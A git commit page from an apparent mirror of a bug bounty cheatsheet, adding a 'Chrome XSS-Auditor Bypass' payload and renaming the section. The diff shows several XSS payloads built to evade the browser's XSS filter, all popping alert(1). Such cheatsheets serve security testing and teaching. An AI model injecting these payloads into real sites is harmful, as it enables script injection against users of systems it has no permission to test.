mirror of
https://github.com/EdOverflow/bugbounty-cheatsheet.git
synced 2024-11-22 11:03:14 +00:00
Create "Chrome XSS-Auditor Bypasses" section.
This commit is contained in:
parent
a4a9136630
commit
c9de842499
1 changed files with 5 additions and 1 deletions
|
@ -12,12 +12,16 @@
|
|||
<script src="data:,alert(1)%250A-->
|
||||
```
|
||||
|
||||
**Chrome XSS-Auditor Bypass**
|
||||
**Other Chrome XSS-Auditor Bypasses**
|
||||
|
||||
```html
|
||||
<script>alert(1)</script
|
||||
```
|
||||
|
||||
```html
|
||||
<script>alert(1)%0d%0a-->%09</script
|
||||
```
|
||||
|
||||
**XSS Polyglot** by [Ahmed Elsobky](https://github.com/0xSobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot)
|
||||
|
||||
```
|
||||
|
|
Loading…
Reference in a new issue